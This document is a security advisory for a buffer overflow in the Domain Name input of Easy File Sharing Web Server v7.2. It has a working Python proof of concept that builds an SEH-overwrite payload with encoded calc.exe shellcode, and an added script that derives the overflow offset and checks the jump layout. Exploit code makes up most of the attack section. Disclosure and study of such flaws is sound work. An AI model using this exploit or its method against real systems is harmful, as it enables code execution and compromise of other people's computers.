Easy File Sharing WS v7.2 – (Domain Name) Buffer Overflow Exploit

A local buffer overflow vulnerability has been discovered in the official Easy File Sharing Web Server v7.2. The overflow lets a local attacker overwrite saved control data (e.g. EIP; the PoC below overwrites the structured exception handler record with a short jump and a pop/pop/ret gadget) and take control of the local software process. It can be exploited by local attackers (a restricted user account suffices, see the PoC) to compromise the affected computer system. The issue is classified as a classic buffer overflow. The vulnerability is located in the `Domain Name` input field of the Active Directory "Add Domain" function.

Vulnerable Module(s):
[+] Click User Account – Active Directory

Vulnerable Function(s):
[+] Add Domain

Vulnerable Input(s):
[+] Domain Name

Product & Service Introduction:
===============================

Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a Web Browser (IE, Firefox, Chrome etc.). It can help you share files with your users, customers and partners. They can search for and download files from your computer or upload files from theirs. The files on your PC can be accessible from anywhere without special software. Easy File Sharing Web Server also provides a Bulletin Board System (Forum). It makes it easy for remote users to post messages and files to the forum. The Secure Edition adds support for SSL encryption that helps protect businesses against site spoofing and data corruption.

(Copy of the Homepage: http://www.sharing-file.com/)

Date of Discovery:
==================

2018-09-19

Exploitation Technique:
=======================

Local & remote (the PoC below is local: the payload is pasted into the application GUI)

Platform Tested:
===============

Windows 7

Risk Level:
===========

Proof of Concept (PoC):
=======================

The buffer overflow can be exploited by a local attacker with a restricted (non-administrative) user account and without interaction from another user.
To reproduce the issue for a security demonstration, follow the steps below.

1. Download and install Easy File Sharing Web Server v7.2.
2. Run the Python script below; it writes the payload to a file (poc.txt).
3. Start the software and open "Click User Account -> Active Directory -> Add Domain -> Domain Name (input)".
4. Paste the contents of poc.txt into the "Domain Name" input and click "OK".
5. The shellcode runs and calc.exe is launched.

#!/usr/bin/env python3
# Builds poc.txt. Layout: padding up to the SEH record, nSEH (short jump),
# SEH (pop/pop/ret gadget address), NOP sled, calc.exe shellcode.
# Bytes literals and binary mode so the script also runs under Python 3.

from struct import pack

buffer = b"\x41" * 4059        # padding up to the exception handler record
a = b"\xeb\x06\x90\x90"        # nSEH: jmp short +6, over the 2 NOPs and the 4-byte SEH address
b = pack("<I", 0x1001b8c0)     # SEH: 0x1001b8c0 : pop esi # pop ebp # ret
calc = (b"\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38"   # calc.exe shellcode (encoded)
        b"\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf"
        b"\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49"
        b"\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c"
        b"\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda"
        b"\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46"
        b"\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66"
        b"\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42"
        b"\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6"
        b"\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35"
        b"\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b"
        b"\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2"
        b"\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52"
        b"\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55"
        b"\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b"
        b"\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37"
        b"\x8b\x15\x7b\xd2\x2b\xbf\x83")
nops = b"\x90" * 20            # NOP sled that the short jump lands in

poc = buffer + a + b + nops + calc
with open("poc.txt", "wb") as f:   # binary mode: the payload contains non-text bytes
    f.write(poc)
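The PoC hard-codes two numbers, the 4059-byte offset to the exception record and the pop/pop/ret gadget at 0x1001b8c0, without showing where they come from. The script below is an added example, not part of the original advisory: it reimplements the cyclic-pattern method (the same Aa0Aa1... scheme Metasploit's pattern_create/pattern_offset use) to recover the offset from the dword a debugger shows in nSEH, assembles the record in the same junk | nSEH | SEH | NOP sled | shellcode order as the PoC, and checks that the short jump in nSEH really lands in the sled. The offset and gadget address are the advisory's values; the shellcode is a constructed INT3 placeholder, not the calc payload from the page, and the 0x46336646 crash value is the one this pattern would produce at offset 4059, not a value taken from the page.

```python
#!/usr/bin/env python3
"""Added example (not from the original advisory): deriving and checking the
SEH-overwrite layout used by the Easy File Sharing WS 7.2 PoC.

Constants marked 'from the PoC' are the advisory's; everything else is
constructed for illustration.
"""
import string
import struct

NSEH_OFFSET = 4059                  # from the PoC
PPR_GADGET = 0x1001b8c0             # pop esi # pop ebp # ret, from the PoC
PLACEHOLDER_SHELLCODE = b"\xcc" * 8  # constructed stand-in (INT3s), not the calc payload


def pattern_create(length: int) -> str:
    """Cyclic pattern Aa0Aa1Aa2 ... Zz9 (every 3-byte group is unique, max 20280 chars)."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(value, length: int = 20280) -> int:
    """Offset of a 4-byte value inside the pattern, or -1 if absent.

    `value` is either the 4 characters as they sit in memory or the dword the
    debugger prints for nSEH (little-endian, e.g. 0x46336646 for "Ff3F").
    """
    if isinstance(value, int):
        value = struct.pack("<I", value).decode("ascii")
    return pattern_create(length).find(value)


def build_seh_payload(offset: int, ppr: int, shellcode: bytes, nop_len: int = 20) -> bytes:
    """Same layout as the PoC: junk | nSEH | SEH | NOP sled | shellcode."""
    junk = b"A" * offset
    # jmp short +6 skips its own two trailing NOPs plus the 4-byte SEH handler
    # address, so after the gadget's RET execution continues in the NOP sled.
    nseh = b"\xeb\x06\x90\x90"
    seh = struct.pack("<I", ppr)     # little-endian address of the pop/pop/ret gadget
    return junk + nseh + seh + b"\x90" * nop_len + shellcode


def check_layout(payload: bytes, offset: int) -> dict:
    """Decode the record at `offset` and compute where the short jump lands."""
    nseh = payload[offset:offset + 4]
    seh = struct.unpack("<I", payload[offset + 4:offset + 8])[0]
    if nseh[0] != 0xEB:
        raise ValueError("nSEH does not start with a short jump")
    rel8 = struct.unpack("<b", nseh[1:2])[0]
    landing = offset + 2 + rel8      # rel8 is relative to the instruction after the 2-byte jmp
    return {
        "seh": seh,
        "landing": landing,
        "lands_in_sled": payload[landing] == 0x90,
    }


if __name__ == "__main__":
    # Step 1: crash the target with a pattern; the debugger shows nSEH = 0x46336646.
    pat = pattern_create(4096)
    print("pattern bytes at 4059:", pat[4059:4063])
    print("pattern_offset(0x46336646) ->", pattern_offset(0x46336646))
    # Step 2: assemble the real layout and verify the jump target.
    payload = build_seh_payload(NSEH_OFFSET, PPR_GADGET, PLACEHOLDER_SHELLCODE)
    print(check_layout(payload, NSEH_OFFSET))
```

Two practical points follow from this: pattern_offset must be fed the nSEH dword, not the SEH one, because nSEH is the first four bytes of the record and SEH sits four bytes further on; and the gadget address is tied to the module base of the tested build (Windows 7 in the advisory), so on any other build the pop/pop/ret must be located again before the PoC is reused.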

References:
===========
[+] www.vulnerability-lab.com
